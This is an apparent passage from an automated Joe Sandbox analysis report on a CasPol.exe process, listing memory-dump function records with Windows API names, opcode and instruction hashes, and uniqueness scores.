                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ccf0a86f2707eeb01501dc81ffae8d1c868fd29e745afde3ec06689b32086357
                                                                                      • Instruction ID: 7e1b8d24b691bd03b47ebdee2d14f47c8bf45549bfaa64f1f7784508cd610035
                                                                                      • Opcode Fuzzy Hash: ccf0a86f2707eeb01501dc81ffae8d1c868fd29e745afde3ec06689b32086357
                                                                                      • Instruction Fuzzy Hash: F9522AB4A00328CFCB65DF64C98869DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 74b771127310a0ef2644efee22c5ca94f35da46911bffb81aac495be1bb3d298
                                                                                      • Instruction ID: cf68e25a1e606ef6d85adb628ab4e9644f1b549857a5fde93de04f80045d4a1a
                                                                                      • Opcode Fuzzy Hash: 74b771127310a0ef2644efee22c5ca94f35da46911bffb81aac495be1bb3d298
                                                                                      • Instruction Fuzzy Hash: 54423AB4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8ac709a2b6a22b52730eab54dbb9fdd7abca586fc741d9a07e888ddbd2cd0133
                                                                                      • Instruction ID: 627e8e7173e7c146778dde0f05d85fd5e0f77c7a3ec1a33db87893c382ecd242
                                                                                      • Opcode Fuzzy Hash: 8ac709a2b6a22b52730eab54dbb9fdd7abca586fc741d9a07e888ddbd2cd0133
                                                                                      • Instruction Fuzzy Hash: E34229B4A00324CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3fa1c7fcea5a4bc60e59357432a4a7469cfd17fdba4cbf1cc57c5e4a8c802ac7
                                                                                      • Instruction ID: d747dc991b1ff3989e1c86aab61eaffa7ba55cfeab489b0a4588dacb1c355f00
                                                                                      • Opcode Fuzzy Hash: 3fa1c7fcea5a4bc60e59357432a4a7469cfd17fdba4cbf1cc57c5e4a8c802ac7
                                                                                      • Instruction Fuzzy Hash: D64239B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4abbeb40107158d73c5c50a6d353acf56a71ae2d27a8861a251312c27ea08c8b
                                                                                      • Instruction ID: 4e30a348766a70c0540483595d4856e9edcfdf8b98f6dc205920e59641622ff8
                                                                                      • Opcode Fuzzy Hash: 4abbeb40107158d73c5c50a6d353acf56a71ae2d27a8861a251312c27ea08c8b
                                                                                      • Instruction Fuzzy Hash: 794229B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3d5ab2d6e273ad303d59384e4070ecf18e9d2e63ad18c0a1a85756e952683887
                                                                                      • Instruction ID: 06a76c2f74e543f60d5c3e3627c13634ffcabc28b3eeeecf563a47cda9d303e1
                                                                                      • Opcode Fuzzy Hash: 3d5ab2d6e273ad303d59384e4070ecf18e9d2e63ad18c0a1a85756e952683887
                                                                                      • Instruction Fuzzy Hash: 9E4238B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: afeb1dd948b553a25caf71e364417a89a33b9387c425cb6194a3d0fc5538ae41
                                                                                      • Instruction ID: 16ffcaa592d27f524f567e364e9e05f7ae9f2064b26455d6666e8e7182f23527
                                                                                      • Opcode Fuzzy Hash: afeb1dd948b553a25caf71e364417a89a33b9387c425cb6194a3d0fc5538ae41
                                                                                      • Instruction Fuzzy Hash: 664229B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c0caa200d7b4f147ea7f8f427948305ad482ec2d36110ef682b231aed334452f
                                                                                      • Instruction ID: 9f7b3ecac634dca0ca04e84f96c9c3ae5a4824d6f07b596173f21151a53b0478
                                                                                      • Opcode Fuzzy Hash: c0caa200d7b4f147ea7f8f427948305ad482ec2d36110ef682b231aed334452f
                                                                                      • Instruction Fuzzy Hash: 8F4229B4A01224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c6cc2f46683b416a803cb3164408be728d294de8ab317e02681fddddf95429a3
                                                                                      • Instruction ID: 0fde9af43c985c04a3e05e63ae56e753d4affa442d7117a39bf6e5dd9cb2f69f
                                                                                      • Opcode Fuzzy Hash: c6cc2f46683b416a803cb3164408be728d294de8ab317e02681fddddf95429a3
                                                                                      • Instruction Fuzzy Hash: 4B3229B4A01224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 38367d5c9fe744052a4bceee7f21f21b642d143a7ed01295ed1c2cdfd5cf108c
                                                                                      • Instruction ID: 5a0263a1b2f0afdd73035674e8f434b5e65595862a63191cac97d54262516a50
                                                                                      • Opcode Fuzzy Hash: 38367d5c9fe744052a4bceee7f21f21b642d143a7ed01295ed1c2cdfd5cf108c
                                                                                      • Instruction Fuzzy Hash: 603229B4A01224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1c52ce6803f170fd60991f62920f85c45c10737862d6c91b6397f636c2b8d0ce
                                                                                      • Instruction ID: 910be96b695b25f327c62f80f5bcabd53923f166a65b7b4be846015c896b0c1d
                                                                                      • Opcode Fuzzy Hash: 1c52ce6803f170fd60991f62920f85c45c10737862d6c91b6397f636c2b8d0ce
                                                                                      • Instruction Fuzzy Hash: 9B3229B4A01224CFCB65DF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 56a48bcd16503508dd2bbd680e9f6b378ec7eb7667540f8ebc9bcf4308d31193
                                                                                      • Instruction ID: 0dee6d53748645e5e4d414a2f22f50c462e84979d97b34d9c71cf76ab8e2053f
                                                                                      • Opcode Fuzzy Hash: 56a48bcd16503508dd2bbd680e9f6b378ec7eb7667540f8ebc9bcf4308d31193
                                                                                      • Instruction Fuzzy Hash: CA3219B4A00224CFCB65DF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c00d55234564782ae2eb9e1ffc52c6bccee1a7956c127eb737f7e2f6564bcfbe
                                                                                      • Instruction ID: be713bc6b1fbd7dd6634942e3f6914d81f4e421ba621314d95ba5e42b1952d5c
                                                                                      • Opcode Fuzzy Hash: c00d55234564782ae2eb9e1ffc52c6bccee1a7956c127eb737f7e2f6564bcfbe
                                                                                      • Instruction Fuzzy Hash: 6E3219B4A00224CFCB65DF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0326a7449ddba8ef01ab4facf89bd34f218bc663b1a87c854b973c6cb15d6b70
                                                                                      • Instruction ID: 23b75d6c0a0d070a9058eb0024bd28f4125cf36ea8dafd8f700b64ff6510d184
                                                                                      • Opcode Fuzzy Hash: 0326a7449ddba8ef01ab4facf89bd34f218bc663b1a87c854b973c6cb15d6b70
                                                                                      • Instruction Fuzzy Hash: 5D3219B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0a767d978392d7b0a558351be57d7bc623fb4a24eeaa46c12a288f01868d2a3f
                                                                                      • Instruction ID: 4fadc9d4b1d735dc9337f9a4f107b5cace7ff4bdd1d144dba5a9b3fe9a4056e3
                                                                                      • Opcode Fuzzy Hash: 0a767d978392d7b0a558351be57d7bc623fb4a24eeaa46c12a288f01868d2a3f
                                                                                      • Instruction Fuzzy Hash: 042218B4A00228CFCB65DF64C98879DBBB6BF88305F5084E9D50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e628d7858cdf3716a81e7e9ffa577e33bc709a12bce72621250041c715936f36
                                                                                      • Instruction ID: e37c33cfeb6c7355736fe36efc58e5f505a4625111126b9b6bc0bdb274e78b81
                                                                                      • Opcode Fuzzy Hash: e628d7858cdf3716a81e7e9ffa577e33bc709a12bce72621250041c715936f36
                                                                                      • Instruction Fuzzy Hash: E22217B4A00228CFCB64EF64C98879DBBB6BF88205F5084E9D50AA3344DB359E95CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6156fa723bc674ea70f16d458ddf313d9f01c08f744c149f6b8fc5f729d1ae60
                                                                                      • Instruction ID: 8971ce2e90aef4b86a7a40d33aace85802f9ea09d9a6a05993dbac8a47383058
                                                                                      • Opcode Fuzzy Hash: 6156fa723bc674ea70f16d458ddf313d9f01c08f744c149f6b8fc5f729d1ae60
                                                                                      • Instruction Fuzzy Hash: FD2207B4A00228CFCB64EF64C98879DBBB6BF88205F5084E9D50AA3344DF359E95CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 724be651c6e705d095df33ef9046337b9d766722f8e727c8e47d4b6170c15be4
                                                                                      • Instruction ID: a0a7aee1f6768c2bc11cb87e2d61695306b2e03c7098f5a3779ddfa59979acba
                                                                                      • Opcode Fuzzy Hash: 724be651c6e705d095df33ef9046337b9d766722f8e727c8e47d4b6170c15be4
                                                                                      • Instruction Fuzzy Hash: 4022F6B4A00228CFCB64EF64C98879DBBB6BF88205F5084E9D50AA3344DF359E95CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2954cd80c428d4d831dc47697e4bf6b8603c30d170b6978359e956e31b34984d
                                                                                      • Instruction ID: a8b8c33d268ecd3e6fed5c9407c50d4ff1053de1953e09035bf9c7a0e4375c33
                                                                                      • Opcode Fuzzy Hash: 2954cd80c428d4d831dc47697e4bf6b8603c30d170b6978359e956e31b34984d
                                                                                      • Instruction Fuzzy Hash: 5C619334A1021ADFEB25DFB4D4887AE7BF2BF44345F118828D516AB398DF389845CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 62913757a791b8176b3bbf4930595677915092e51b1e8536a5db5376e2c29f73
                                                                                      • Instruction ID: 79c5de092ae8b6e8cc8f921b342e752125098a080428b69e3948dfcb4ad395e6
                                                                                      • Opcode Fuzzy Hash: 62913757a791b8176b3bbf4930595677915092e51b1e8536a5db5376e2c29f73
                                                                                      • Instruction Fuzzy Hash: 0951F031B053459FDB02DBB4C888AEE77F6BF89204F04856AE116DB296EB74DC05CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7b78e8bee5373f12d9544faec3b1d5ab3bd46ea6f42880b3727470210715889f
                                                                                      • Instruction ID: 82b16d388ad91894c8d35cc9d249f5636fc314a115a94ff0cd9f274468122a1b
                                                                                      • Opcode Fuzzy Hash: 7b78e8bee5373f12d9544faec3b1d5ab3bd46ea6f42880b3727470210715889f
                                                                                      • Instruction Fuzzy Hash: 7751C375B003099FDB05DBB4C888AAEB7B6BF88204F048929D5169B395EF74EC05CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D7A690A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: b79262392925f4dfd33e46c7f2bdbe515db5863a10b670cf811e25e593e162af
                                                                                      • Instruction ID: bca8dc6d6474cb2318f7fa94f04a796cc7d10634c9d0c85d1725e7792315afb9
                                                                                      • Opcode Fuzzy Hash: b79262392925f4dfd33e46c7f2bdbe515db5863a10b670cf811e25e593e162af
                                                                                      • Instruction Fuzzy Hash: 4851D2B5C00309DFDF14CF99C884ADEBBB5BF88310F25822AE815AB210D7759945CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • TerminateThread.KERNEL32(6B396C6F,D9A09985), ref: 0111263C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926261275.0000000001112000.00000040.00000400.00020000.00000000.sdmp, Offset: 01112000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1112000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: TerminateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1852365436-0
                                                                                      • Opcode ID: 48a4bb1b8a5b674a119ada6d3adbf7d39e80f03258f37b97f4ad20b14f5f34a7
                                                                                      • Instruction ID: 3f4abdb88e691fca68fe4363d8ae0d789ae9471055ebf5493b360f2303997ffd
                                                                                      • Opcode Fuzzy Hash: 48a4bb1b8a5b674a119ada6d3adbf7d39e80f03258f37b97f4ad20b14f5f34a7
                                                                                      • Instruction Fuzzy Hash: 5F312836204701CFEB289F58A4A8BA2F3A2EF907B4F75467BEC05C7095D7369081CA46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D7A690A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 5806b2ca0a4c11786f4c000f9d814b0c6dbf398af4aa6e54931e8206056628d8
                                                                                      • Instruction ID: b9a6abea6606dca1f381d7fcc72ab0122e816edf23568f6f3926bfb60ea36220
                                                                                      • Opcode Fuzzy Hash: 5806b2ca0a4c11786f4c000f9d814b0c6dbf398af4aa6e54931e8206056628d8
                                                                                      • Instruction Fuzzy Hash: B641C2B1D00309DFDF14CF99C884ADEBBB5BF88310F25822AE819AB250D775A945CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0151C04C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 7e3835a7e2b24a9fc33b42a6202ad5681bd84a5106e3881db9e99c3eae965d5d
                                                                                      • Instruction ID: 54b8d7f0134802e0c30b4b46d3f5e3c8f727209f2e88d28e0903bf8ea059fb3c
                                                                                      • Opcode Fuzzy Hash: 7e3835a7e2b24a9fc33b42a6202ad5681bd84a5106e3881db9e99c3eae965d5d
                                                                                      • Instruction Fuzzy Hash: 024156B0E043498FEB11CFA9C548A9EFFF1BF49304F15816AE908AB356C7B59845CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7AA5D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: a0fea91e135cbe5f5fd8b6a47150f6cb666f7cfeb640b2ba73c71618a029257a
                                                                                      • Instruction ID: 0a72403e87895f3c26b983bca6f2cb7da747f3925371eaee9123c818c8f4eff4
                                                                                      • Opcode Fuzzy Hash: a0fea91e135cbe5f5fd8b6a47150f6cb666f7cfeb640b2ba73c71618a029257a
                                                                                      • Instruction Fuzzy Hash: 96418F78640395AFE7009FA8D4E5B7A3BB5F749721F108259E9058B3E1CB7A0952CF21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 1D7AB4D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 433d66aca03a94927a253a31e3e356adf19df545bc79c224e24eb4ad01433980
                                                                                      • Instruction ID: a97df9758226023eaffacde8ac16843e94568aca3af6b586a5902f66841c558e
                                                                                      • Opcode Fuzzy Hash: 433d66aca03a94927a253a31e3e356adf19df545bc79c224e24eb4ad01433980
                                                                                      • Instruction Fuzzy Hash: 45414DB4900249DFCB10CF95C484AAAFBF5FF88324F19C959D519AB321D775A841CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,017642B1,00000800), ref: 01764392
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 0171f612f9f3519e0dff3a84bac272fb9ad3726c01dac016e960727313ab7e6f
                                                                                      • Instruction ID: 7de65eccce84e211eab3705f8b7d783d67205d8d44158a88ed6f44d402400667
                                                                                      • Opcode Fuzzy Hash: 0171f612f9f3519e0dff3a84bac272fb9ad3726c01dac016e960727313ab7e6f
                                                                                      • Instruction Fuzzy Hash: 3931EDB19043898FDB11CFAAC804ADAFBF4EF85314F14846AD949E7242D3799805CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0151C2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: 203f831b82f0c9ececc430f9a95ef36e59977e73b3685e8de2a3d9d2ab5dbb47
                                                                                      • Instruction ID: 60c8c32a05d991ff3a4e72f784802786c7af10a78b7009031d25fd99f5fe1e77
                                                                                      • Opcode Fuzzy Hash: 203f831b82f0c9ececc430f9a95ef36e59977e73b3685e8de2a3d9d2ab5dbb47
